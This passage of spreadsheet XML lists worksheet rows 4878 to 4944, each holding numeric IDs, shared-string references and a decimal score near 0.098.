    <row r="4878" ht="15.75" customHeight="1">
      <c r="A4878" s="1">
        <v>15297.0</v>
      </c>
      <c r="B4878" s="2">
        <v>4.2438234E7</v>
      </c>
      <c r="C4878" s="2" t="s">
        <v>4664</v>
      </c>
      <c r="D4878" s="2">
        <v>1.0</v>
      </c>
      <c r="E4878" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4878" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4879" ht="15.75" customHeight="1">
      <c r="A4879" s="1">
        <v>15544.0</v>
      </c>
      <c r="B4879" s="2">
        <v>4.3376929E7</v>
      </c>
      <c r="C4879" s="2" t="s">
        <v>4665</v>
      </c>
      <c r="D4879" s="2">
        <v>1.0</v>
      </c>
      <c r="E4879" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4879" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4880" ht="15.75" customHeight="1">
      <c r="A4880" s="1">
        <v>15640.0</v>
      </c>
      <c r="B4880" s="2">
        <v>4.3586278E7</v>
      </c>
      <c r="C4880" s="2" t="s">
        <v>4666</v>
      </c>
      <c r="D4880" s="2">
        <v>1.0</v>
      </c>
      <c r="E4880" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4880" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4881" ht="15.75" customHeight="1">
      <c r="A4881" s="1">
        <v>15889.0</v>
      </c>
      <c r="B4881" s="2">
        <v>4.4554004E7</v>
      </c>
      <c r="C4881" s="2" t="s">
        <v>4667</v>
      </c>
      <c r="D4881" s="2">
        <v>1.0</v>
      </c>
      <c r="E4881" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4881" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4882" ht="15.75" customHeight="1">
      <c r="A4882" s="1">
        <v>16189.0</v>
      </c>
      <c r="B4882" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C4882" s="2" t="s">
        <v>4668</v>
      </c>
      <c r="D4882" s="2">
        <v>1.0</v>
      </c>
      <c r="E4882" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4882" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4883" ht="15.75" customHeight="1">
      <c r="A4883" s="1">
        <v>16260.0</v>
      </c>
      <c r="B4883" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C4883" s="2" t="s">
        <v>4669</v>
      </c>
      <c r="D4883" s="2">
        <v>1.0</v>
      </c>
      <c r="E4883" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4883" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4884" ht="15.75" customHeight="1">
      <c r="A4884" s="1">
        <v>16333.0</v>
      </c>
      <c r="B4884" s="2">
        <v>4.6044504E7</v>
      </c>
      <c r="C4884" s="2" t="s">
        <v>4670</v>
      </c>
      <c r="D4884" s="2">
        <v>1.0</v>
      </c>
      <c r="E4884" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4884" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4885" ht="15.75" customHeight="1">
      <c r="A4885" s="1">
        <v>16832.0</v>
      </c>
      <c r="B4885" s="2">
        <v>4.7893894E7</v>
      </c>
      <c r="C4885" s="2" t="s">
        <v>4671</v>
      </c>
      <c r="D4885" s="2">
        <v>1.0</v>
      </c>
      <c r="E4885" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4885" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4886" ht="15.75" customHeight="1">
      <c r="A4886" s="1">
        <v>16967.0</v>
      </c>
      <c r="B4886" s="2">
        <v>4.827882E7</v>
      </c>
      <c r="C4886" s="2" t="s">
        <v>4672</v>
      </c>
      <c r="D4886" s="2">
        <v>1.0</v>
      </c>
      <c r="E4886" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4886" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4887" ht="15.75" customHeight="1">
      <c r="A4887" s="1">
        <v>17358.0</v>
      </c>
      <c r="B4887" s="2">
        <v>4.9445046E7</v>
      </c>
      <c r="C4887" s="2" t="s">
        <v>4673</v>
      </c>
      <c r="D4887" s="2">
        <v>1.0</v>
      </c>
      <c r="E4887" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4887" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4888" ht="15.75" customHeight="1">
      <c r="A4888" s="1">
        <v>17471.0</v>
      </c>
      <c r="B4888" s="2">
        <v>4.9898918E7</v>
      </c>
      <c r="C4888" s="2" t="s">
        <v>4674</v>
      </c>
      <c r="D4888" s="2">
        <v>1.0</v>
      </c>
      <c r="E4888" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4888" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4889" ht="15.75" customHeight="1">
      <c r="A4889" s="1">
        <v>17780.0</v>
      </c>
      <c r="B4889" s="2">
        <v>5.0771512E7</v>
      </c>
      <c r="C4889" s="2" t="s">
        <v>4675</v>
      </c>
      <c r="D4889" s="2">
        <v>1.0</v>
      </c>
      <c r="E4889" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4889" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4890" ht="15.75" customHeight="1">
      <c r="A4890" s="1">
        <v>17810.0</v>
      </c>
      <c r="B4890" s="2">
        <v>5.0871717E7</v>
      </c>
      <c r="C4890" s="2" t="s">
        <v>4676</v>
      </c>
      <c r="D4890" s="2">
        <v>1.0</v>
      </c>
      <c r="E4890" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4890" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4891" ht="15.75" customHeight="1">
      <c r="A4891" s="1">
        <v>17971.0</v>
      </c>
      <c r="B4891" s="2">
        <v>5.1358404E7</v>
      </c>
      <c r="C4891" s="2" t="s">
        <v>4677</v>
      </c>
      <c r="D4891" s="2">
        <v>1.0</v>
      </c>
      <c r="E4891" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4891" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4892" ht="15.75" customHeight="1">
      <c r="A4892" s="1">
        <v>18159.0</v>
      </c>
      <c r="B4892" s="2">
        <v>5.1897119E7</v>
      </c>
      <c r="C4892" s="2" t="s">
        <v>4678</v>
      </c>
      <c r="D4892" s="2">
        <v>1.0</v>
      </c>
      <c r="E4892" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4892" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4893" ht="15.75" customHeight="1">
      <c r="A4893" s="1">
        <v>18333.0</v>
      </c>
      <c r="B4893" s="2">
        <v>5.2414697E7</v>
      </c>
      <c r="C4893" s="2" t="s">
        <v>4679</v>
      </c>
      <c r="D4893" s="2">
        <v>1.0</v>
      </c>
      <c r="E4893" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4893" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4894" ht="15.75" customHeight="1">
      <c r="A4894" s="1">
        <v>18502.0</v>
      </c>
      <c r="B4894" s="2">
        <v>5.2950121E7</v>
      </c>
      <c r="C4894" s="2" t="s">
        <v>4680</v>
      </c>
      <c r="D4894" s="2">
        <v>1.0</v>
      </c>
      <c r="E4894" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4894" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4895" ht="15.75" customHeight="1">
      <c r="A4895" s="1">
        <v>19755.0</v>
      </c>
      <c r="B4895" s="2">
        <v>5.6708209E7</v>
      </c>
      <c r="C4895" s="2" t="s">
        <v>4681</v>
      </c>
      <c r="D4895" s="2">
        <v>1.0</v>
      </c>
      <c r="E4895" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4895" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4896" ht="15.75" customHeight="1">
      <c r="A4896" s="1">
        <v>19910.0</v>
      </c>
      <c r="B4896" s="2">
        <v>5.735021E7</v>
      </c>
      <c r="C4896" s="2" t="s">
        <v>4682</v>
      </c>
      <c r="D4896" s="2">
        <v>1.0</v>
      </c>
      <c r="E4896" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4896" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4897" ht="15.75" customHeight="1">
      <c r="A4897" s="1">
        <v>20069.0</v>
      </c>
      <c r="B4897" s="2">
        <v>8737583.0</v>
      </c>
      <c r="C4897" s="2" t="s">
        <v>4683</v>
      </c>
      <c r="D4897" s="2">
        <v>1.0</v>
      </c>
      <c r="E4897" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4897" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4898" ht="15.75" customHeight="1">
      <c r="A4898" s="1">
        <v>20873.0</v>
      </c>
      <c r="B4898" s="2">
        <v>1.5971284E7</v>
      </c>
      <c r="C4898" s="2" t="s">
        <v>4684</v>
      </c>
      <c r="D4898" s="2">
        <v>1.0</v>
      </c>
      <c r="E4898" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4898" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4899" ht="15.75" customHeight="1">
      <c r="A4899" s="1">
        <v>20903.0</v>
      </c>
      <c r="B4899" s="2">
        <v>1.627334E7</v>
      </c>
      <c r="C4899" s="2" t="s">
        <v>4685</v>
      </c>
      <c r="D4899" s="2">
        <v>1.0</v>
      </c>
      <c r="E4899" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4899" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4900" ht="15.75" customHeight="1">
      <c r="A4900" s="1">
        <v>22172.0</v>
      </c>
      <c r="B4900" s="2">
        <v>3.1649547E7</v>
      </c>
      <c r="C4900" s="2" t="s">
        <v>4686</v>
      </c>
      <c r="D4900" s="2">
        <v>1.0</v>
      </c>
      <c r="E4900" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4900" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4901" ht="15.75" customHeight="1">
      <c r="A4901" s="1">
        <v>22772.0</v>
      </c>
      <c r="B4901" s="2">
        <v>4.4985781E7</v>
      </c>
      <c r="C4901" s="2" t="s">
        <v>4687</v>
      </c>
      <c r="D4901" s="2">
        <v>1.0</v>
      </c>
      <c r="E4901" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4901" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4902" ht="15.75" customHeight="1">
      <c r="A4902" s="1">
        <v>23747.0</v>
      </c>
      <c r="B4902" s="2">
        <v>7424752.0</v>
      </c>
      <c r="C4902" s="2" t="s">
        <v>4688</v>
      </c>
      <c r="D4902" s="2">
        <v>1.0</v>
      </c>
      <c r="E4902" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4902" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4903" ht="15.75" customHeight="1">
      <c r="A4903" s="1">
        <v>23875.0</v>
      </c>
      <c r="B4903" s="2">
        <v>8356082.0</v>
      </c>
      <c r="C4903" s="2" t="s">
        <v>4689</v>
      </c>
      <c r="D4903" s="2">
        <v>1.0</v>
      </c>
      <c r="E4903" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4903" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4904" ht="15.75" customHeight="1">
      <c r="A4904" s="1">
        <v>24058.0</v>
      </c>
      <c r="B4904" s="2">
        <v>9577486.0</v>
      </c>
      <c r="C4904" s="2" t="s">
        <v>4690</v>
      </c>
      <c r="D4904" s="2">
        <v>1.0</v>
      </c>
      <c r="E4904" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4904" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4905" ht="15.75" customHeight="1">
      <c r="A4905" s="1">
        <v>24436.0</v>
      </c>
      <c r="B4905" s="2">
        <v>1.0894565E7</v>
      </c>
      <c r="C4905" s="2" t="s">
        <v>4691</v>
      </c>
      <c r="D4905" s="2">
        <v>1.0</v>
      </c>
      <c r="E4905" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4905" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4906" ht="15.75" customHeight="1">
      <c r="A4906" s="1">
        <v>25217.0</v>
      </c>
      <c r="B4906" s="2">
        <v>1.3285864E7</v>
      </c>
      <c r="C4906" s="2" t="s">
        <v>4692</v>
      </c>
      <c r="D4906" s="2">
        <v>1.0</v>
      </c>
      <c r="E4906" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4906" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4907" ht="15.75" customHeight="1">
      <c r="A4907" s="1">
        <v>26133.0</v>
      </c>
      <c r="B4907" s="2">
        <v>1.5971283E7</v>
      </c>
      <c r="C4907" s="2" t="s">
        <v>4684</v>
      </c>
      <c r="D4907" s="2">
        <v>1.0</v>
      </c>
      <c r="E4907" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4907" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4908" ht="15.75" customHeight="1">
      <c r="A4908" s="1">
        <v>26222.0</v>
      </c>
      <c r="B4908" s="2">
        <v>1.6273339E7</v>
      </c>
      <c r="C4908" s="2" t="s">
        <v>4685</v>
      </c>
      <c r="D4908" s="2">
        <v>1.0</v>
      </c>
      <c r="E4908" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4908" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4909" ht="15.75" customHeight="1">
      <c r="A4909" s="1">
        <v>26603.0</v>
      </c>
      <c r="B4909" s="2">
        <v>1.798606E7</v>
      </c>
      <c r="C4909" s="2" t="s">
        <v>4693</v>
      </c>
      <c r="D4909" s="2">
        <v>1.0</v>
      </c>
      <c r="E4909" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4909" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4910" ht="15.75" customHeight="1">
      <c r="A4910" s="1">
        <v>31180.0</v>
      </c>
      <c r="B4910" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C4910" s="2" t="s">
        <v>4694</v>
      </c>
      <c r="D4910" s="2">
        <v>1.0</v>
      </c>
      <c r="E4910" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4910" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4911" ht="15.75" customHeight="1">
      <c r="A4911" s="1">
        <v>31629.0</v>
      </c>
      <c r="B4911" s="2">
        <v>5144083.0</v>
      </c>
      <c r="C4911" s="2" t="s">
        <v>4695</v>
      </c>
      <c r="D4911" s="2">
        <v>1.0</v>
      </c>
      <c r="E4911" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4911" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4912" ht="15.75" customHeight="1">
      <c r="A4912" s="1">
        <v>31666.0</v>
      </c>
      <c r="B4912" s="2">
        <v>5175966.0</v>
      </c>
      <c r="C4912" s="2" t="s">
        <v>4696</v>
      </c>
      <c r="D4912" s="2">
        <v>1.0</v>
      </c>
      <c r="E4912" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4912" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4913" ht="15.75" customHeight="1">
      <c r="A4913" s="1">
        <v>33190.0</v>
      </c>
      <c r="B4913" s="2">
        <v>7126013.0</v>
      </c>
      <c r="C4913" s="2" t="s">
        <v>4697</v>
      </c>
      <c r="D4913" s="2">
        <v>1.0</v>
      </c>
      <c r="E4913" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4913" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4914" ht="15.75" customHeight="1">
      <c r="A4914" s="1">
        <v>33544.0</v>
      </c>
      <c r="B4914" s="2">
        <v>8181075.0</v>
      </c>
      <c r="C4914" s="2" t="s">
        <v>4698</v>
      </c>
      <c r="D4914" s="2">
        <v>1.0</v>
      </c>
      <c r="E4914" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4914" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4915" ht="15.75" customHeight="1">
      <c r="A4915" s="1">
        <v>33546.0</v>
      </c>
      <c r="B4915" s="2">
        <v>8181092.0</v>
      </c>
      <c r="C4915" s="2" t="s">
        <v>4698</v>
      </c>
      <c r="D4915" s="2">
        <v>1.0</v>
      </c>
      <c r="E4915" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4915" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4916" ht="15.75" customHeight="1">
      <c r="A4916" s="1">
        <v>29860.0</v>
      </c>
      <c r="B4916" s="2">
        <v>3.5820415E7</v>
      </c>
      <c r="C4916" s="2" t="s">
        <v>4699</v>
      </c>
      <c r="D4916" s="2">
        <v>1.0</v>
      </c>
      <c r="E4916" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4916" s="2">
        <v>0.09927140255009106</v>
      </c>
    </row>
    <row r="4917" ht="15.75" customHeight="1">
      <c r="A4917" s="1">
        <v>2533.0</v>
      </c>
      <c r="B4917" s="2">
        <v>3.4097042E7</v>
      </c>
      <c r="C4917" s="2" t="s">
        <v>4700</v>
      </c>
      <c r="D4917" s="2">
        <v>1.0</v>
      </c>
      <c r="E4917" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4917" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="4918" ht="15.75" customHeight="1">
      <c r="A4918" s="1">
        <v>7235.0</v>
      </c>
      <c r="B4918" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C4918" s="2" t="s">
        <v>4701</v>
      </c>
      <c r="D4918" s="2">
        <v>1.0</v>
      </c>
      <c r="E4918" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4918" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="4919" ht="15.75" customHeight="1">
      <c r="A4919" s="1">
        <v>29217.0</v>
      </c>
      <c r="B4919" s="2">
        <v>3.0801001E7</v>
      </c>
      <c r="C4919" s="2" t="s">
        <v>4702</v>
      </c>
      <c r="D4919" s="2">
        <v>1.0</v>
      </c>
      <c r="E4919" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4919" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="4920" ht="15.75" customHeight="1">
      <c r="A4920" s="1">
        <v>2363.0</v>
      </c>
      <c r="B4920" s="2">
        <v>3.3234512E7</v>
      </c>
      <c r="C4920" s="2" t="s">
        <v>4703</v>
      </c>
      <c r="D4920" s="2">
        <v>1.0</v>
      </c>
      <c r="E4920" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4920" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4921" ht="15.75" customHeight="1">
      <c r="A4921" s="1">
        <v>7622.0</v>
      </c>
      <c r="B4921" s="2">
        <v>5.1731691E7</v>
      </c>
      <c r="C4921" s="2" t="s">
        <v>4704</v>
      </c>
      <c r="D4921" s="2">
        <v>1.0</v>
      </c>
      <c r="E4921" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4921" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4922" ht="15.75" customHeight="1">
      <c r="A4922" s="1">
        <v>8473.0</v>
      </c>
      <c r="B4922" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C4922" s="2" t="s">
        <v>4705</v>
      </c>
      <c r="D4922" s="2">
        <v>1.0</v>
      </c>
      <c r="E4922" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4922" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4923" ht="15.75" customHeight="1">
      <c r="A4923" s="1">
        <v>9573.0</v>
      </c>
      <c r="B4923" s="2">
        <v>5.6062406E7</v>
      </c>
      <c r="C4923" s="2" t="s">
        <v>4706</v>
      </c>
      <c r="D4923" s="2">
        <v>1.0</v>
      </c>
      <c r="E4923" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4923" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4924" ht="15.75" customHeight="1">
      <c r="A4924" s="1">
        <v>12342.0</v>
      </c>
      <c r="B4924" s="2">
        <v>2.8601425E7</v>
      </c>
      <c r="C4924" s="2" t="s">
        <v>4707</v>
      </c>
      <c r="D4924" s="2">
        <v>1.0</v>
      </c>
      <c r="E4924" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4924" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4925" ht="15.75" customHeight="1">
      <c r="A4925" s="1">
        <v>15337.0</v>
      </c>
      <c r="B4925" s="2">
        <v>4.2600085E7</v>
      </c>
      <c r="C4925" s="2" t="s">
        <v>4708</v>
      </c>
      <c r="D4925" s="2">
        <v>1.0</v>
      </c>
      <c r="E4925" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4925" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4926" ht="15.75" customHeight="1">
      <c r="A4926" s="1">
        <v>15552.0</v>
      </c>
      <c r="B4926" s="2">
        <v>4.3406391E7</v>
      </c>
      <c r="C4926" s="2" t="s">
        <v>4709</v>
      </c>
      <c r="D4926" s="2">
        <v>1.0</v>
      </c>
      <c r="E4926" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4926" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4927" ht="15.75" customHeight="1">
      <c r="A4927" s="1">
        <v>16081.0</v>
      </c>
      <c r="B4927" s="2">
        <v>4.5364383E7</v>
      </c>
      <c r="C4927" s="2" t="s">
        <v>4710</v>
      </c>
      <c r="D4927" s="2">
        <v>1.0</v>
      </c>
      <c r="E4927" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4927" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4928" ht="15.75" customHeight="1">
      <c r="A4928" s="1">
        <v>17561.0</v>
      </c>
      <c r="B4928" s="2">
        <v>5.0230454E7</v>
      </c>
      <c r="C4928" s="2" t="s">
        <v>4711</v>
      </c>
      <c r="D4928" s="2">
        <v>1.0</v>
      </c>
      <c r="E4928" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4928" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="4929" ht="15.75" customHeight="1">
      <c r="A4929" s="1">
        <v>1151.0</v>
      </c>
      <c r="B4929" s="2">
        <v>2.4402259E7</v>
      </c>
      <c r="C4929" s="2" t="s">
        <v>4712</v>
      </c>
      <c r="D4929" s="2">
        <v>1.0</v>
      </c>
      <c r="E4929" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4929" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="4930" ht="15.75" customHeight="1">
      <c r="A4930" s="1">
        <v>4855.0</v>
      </c>
      <c r="B4930" s="2">
        <v>4.3770018E7</v>
      </c>
      <c r="C4930" s="2" t="s">
        <v>4713</v>
      </c>
      <c r="D4930" s="2">
        <v>1.0</v>
      </c>
      <c r="E4930" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4930" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="4931" ht="15.75" customHeight="1">
      <c r="A4931" s="1">
        <v>8253.0</v>
      </c>
      <c r="B4931" s="2">
        <v>5.3379106E7</v>
      </c>
      <c r="C4931" s="2" t="s">
        <v>4714</v>
      </c>
      <c r="D4931" s="2">
        <v>1.0</v>
      </c>
      <c r="E4931" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4931" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="4932" ht="15.75" customHeight="1">
      <c r="A4932" s="1">
        <v>19388.0</v>
      </c>
      <c r="B4932" s="2">
        <v>5.5536283E7</v>
      </c>
      <c r="C4932" s="2" t="s">
        <v>4715</v>
      </c>
      <c r="D4932" s="2">
        <v>1.0</v>
      </c>
      <c r="E4932" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4932" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="4933" ht="15.75" customHeight="1">
      <c r="A4933" s="1">
        <v>28755.0</v>
      </c>
      <c r="B4933" s="2">
        <v>2.8142623E7</v>
      </c>
      <c r="C4933" s="2" t="s">
        <v>4716</v>
      </c>
      <c r="D4933" s="2">
        <v>1.0</v>
      </c>
      <c r="E4933" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4933" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="4934" ht="15.75" customHeight="1">
      <c r="A4934" s="1">
        <v>16604.0</v>
      </c>
      <c r="B4934" s="2">
        <v>4.7037423E7</v>
      </c>
      <c r="C4934" s="2" t="s">
        <v>4717</v>
      </c>
      <c r="D4934" s="2">
        <v>1.0</v>
      </c>
      <c r="E4934" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4934" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="4935" ht="15.75" customHeight="1">
      <c r="A4935" s="1">
        <v>4986.0</v>
      </c>
      <c r="B4935" s="2">
        <v>4.4143921E7</v>
      </c>
      <c r="C4935" s="2" t="s">
        <v>4718</v>
      </c>
      <c r="D4935" s="2">
        <v>1.0</v>
      </c>
      <c r="E4935" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4935" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="4936" ht="15.75" customHeight="1">
      <c r="A4936" s="1">
        <v>6461.0</v>
      </c>
      <c r="B4936" s="2">
        <v>4.862737E7</v>
      </c>
      <c r="C4936" s="2" t="s">
        <v>4719</v>
      </c>
      <c r="D4936" s="2">
        <v>1.0</v>
      </c>
      <c r="E4936" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4936" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="4937" ht="15.75" customHeight="1">
      <c r="A4937" s="1">
        <v>24247.0</v>
      </c>
      <c r="B4937" s="2">
        <v>1.0500615E7</v>
      </c>
      <c r="C4937" s="2" t="s">
        <v>4720</v>
      </c>
      <c r="D4937" s="2">
        <v>1.0</v>
      </c>
      <c r="E4937" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4937" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="4938" ht="15.75" customHeight="1">
      <c r="A4938" s="1">
        <v>357.0</v>
      </c>
      <c r="B4938" s="2">
        <v>1.6079394E7</v>
      </c>
      <c r="C4938" s="2" t="s">
        <v>4721</v>
      </c>
      <c r="D4938" s="2">
        <v>1.0</v>
      </c>
      <c r="E4938" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4938" s="2">
        <v>0.09797979797979793</v>
      </c>
    </row>
    <row r="4939" ht="15.75" customHeight="1">
      <c r="A4939" s="1">
        <v>9609.0</v>
      </c>
      <c r="B4939" s="2">
        <v>5.6172355E7</v>
      </c>
      <c r="C4939" s="2" t="s">
        <v>4722</v>
      </c>
      <c r="D4939" s="2">
        <v>1.0</v>
      </c>
      <c r="E4939" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4939" s="2">
        <v>0.09797979797979793</v>
      </c>
    </row>
    <row r="4940" ht="15.75" customHeight="1">
      <c r="A4940" s="1">
        <v>1289.0</v>
      </c>
      <c r="B4940" s="2">
        <v>2.5593249E7</v>
      </c>
      <c r="C4940" s="2" t="s">
        <v>4723</v>
      </c>
      <c r="D4940" s="2">
        <v>1.0</v>
      </c>
      <c r="E4940" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4940" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="4941" ht="15.75" customHeight="1">
      <c r="A4941" s="1">
        <v>18859.0</v>
      </c>
      <c r="B4941" s="2">
        <v>5.3984781E7</v>
      </c>
      <c r="C4941" s="2" t="s">
        <v>4724</v>
      </c>
      <c r="D4941" s="2">
        <v>1.0</v>
      </c>
      <c r="E4941" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4941" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="4942" ht="15.75" customHeight="1">
      <c r="A4942" s="1">
        <v>4521.0</v>
      </c>
      <c r="B4942" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C4942" s="2" t="s">
        <v>4725</v>
      </c>
      <c r="D4942" s="2">
        <v>1.0</v>
      </c>
      <c r="E4942" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4942" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="4943" ht="15.75" customHeight="1">
      <c r="A4943" s="1">
        <v>18897.0</v>
      </c>
      <c r="B4943" s="2">
        <v>5.4152293E7</v>
      </c>
      <c r="C4943" s="2" t="s">
        <v>4726</v>
      </c>
      <c r="D4943" s="2">
        <v>1.0</v>
      </c>
      <c r="E4943" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4943" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="4944" ht="15.75" customHeight="1">
      <c r="A4944" s="1">
        <v>9133.0</v>
      </c>
      <c r="B4944" s="2">
        <v>5.523507E7</v>
      </c>
      <c r="C4944" s="2" t="s">
        <v>4727</v>
      </c>
      <c r="D4944" s="2">
        <v>1.0</v>
      </c>
      <c r="E4944" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4944" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
